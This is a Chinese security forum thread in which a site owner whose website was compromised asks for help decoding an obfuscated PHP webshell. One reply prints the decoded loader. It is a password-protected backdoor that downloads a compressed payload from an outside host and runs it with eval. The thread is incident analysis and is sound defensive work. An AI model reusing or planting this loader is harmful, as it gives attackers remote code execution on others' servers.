白帽子安全
厂商漏洞预警
业内新闻动态
安全研究
开源工具分享
技术交流讨论
原创文章发布
AI与区块链安全研究
程序代码学习
WEB代码审计
0day漏洞分析
渗透测试文章
Linux/无线/终端 安全
反病毒/逆向/免杀 二进制
安全检测工具
社会工程交流
夺旗赛研究
甲方文档资料
开源CMS源码
加密破解及悬赏
非安全交流
AI应用交流
VPS服务器讨论
区块链币圈交流
手机卡信用卡
域名外贸跨境
电子产品交流
非技术交流
八卦水区
论坛事务
人才招聘
登录
注册
导航
×
首页
白帽子安全
厂商漏洞预警
(2523)
业内新闻动态
(5886)
安全研究
开源工具分享
(175)
技术交流讨论
(19762)
原创文章发布
(20)
AI与区块链安全研究
(29)
程序代码学习
(1041)
WEB代码审计
(1288)
0day漏洞分析
(30)
渗透测试文章
(5928)
Linux/无线/终端 安全
(248)
反病毒/逆向/免杀 二进制
(459)
安全检测工具
(1692)
社会工程交流
(125)
夺旗赛研究
(337)
甲方文档资料
(109)
开源CMS源码
(38)
加密破解及悬赏
(1948)
非安全交流
AI应用交流
(20)
VPS服务器讨论
(45)
区块链币圈交流
(25)
手机卡信用卡
(7)
域名外贸跨境
(9)
电子产品交流
(44)
非技术交流
八卦水区
(6395)
论坛事务
(1652)
人才招聘
(38)
T00ls
»
八卦水区(Discussion )
网站被黑了 求各位大哥帮忙分析一下 此大马
匿名
2021-08-21 12:04
969
26
好帖, 支持TA
取消
很可惜, 此ID报废之前, 请仔细阅读论坛总架构中的规则贴:
论坛总规则
Reason:
确认要报废此ID!
取消
CIA06
僵尸会员
#1
网站被人撸了,在文件溯源的时候 发现到了这个大马 打开 发现都是加密的 懵懵的 想到tools大神多 所以 弟弟发帖 想请大表哥 帮忙给 弟弟看 能不能给他解密了
最后在教下大表哥们 这类的的加密一般都应该怎么解密
i11us0ry
僵尸会员
2021-08-21
#2
这不就是ascii转字符吗???
i11us0ry
僵尸会员
2021-08-21
#3
回复
2#
i11us0ry
<?php $password='123321';$b='chr';session_start();if(empty($_SESSION['PhpCode'])){$d="http://4w4.in/php/php.gif";$e=file_;$e.=get_c;$e.=onten;$e.=ts;$_SESSION['PhpCode']=$e($d);}$f=gzin;$f.=flate;@eval(/**/$f/**/(/**/$_SESSION/**/[/**/'PhpCode'/**/]/**/)/**/);
Map1e7an
新手上路
2021-08-21
#4
接上楼,附一个
http://4w4.in/php/php.gif
的内容,他的title是这样的,太嚣张了。。。
now55555
注册会员
2021-08-21
#5
这都不是重点 重点是不是出0day了
0x001
新手上路
2021-08-21
#6
回复
3#
i11us0ry
前几天,搞一个溯源,刚好遇到类的这么一个后门,哈哈。
没想到这么快就在这里看到有类似的了。
赢时胜流光
注册会员
2021-08-21
#7
马儿有年头了 以前见过
永
恒
的
少年
野心'
BaiyunCg
新手上路
2021-08-21
#8
这马儿我也有。。确实很叼
Nzpzsec
潜水会员
2021-08-21
#9
马儿有些年头了,有点嚣张
猴子请来的
潜水会员
2021-08-21
#10
这个马我也见过,据说有后门的呢
大王派我来下巡山
1
2
3
下一页
打赏
×
TuBi 数量 (1~49)
1
5
10
20
49
评价理由
确认
取消
帖子评分
×
撤销评分
×
CIA06
僵尸会员
楼主
4
主题
42
帖子
223
TuBi
TA的主帖
私信TA
返回版块
社区首页
本版最新
发现被CNVD或者CVE收录的漏洞难度大吗
请问有没有什么比较好的入门路径呢
国产最强模型“智谱”,正在打包你的东西
测试个漏洞-001
内网信息收集教程
IDA 9.4 中文插件
AI实时换脸
谁有恶魔之眼信息收集工具
移动端app 安全渗透测试
固件漏洞挖掘学习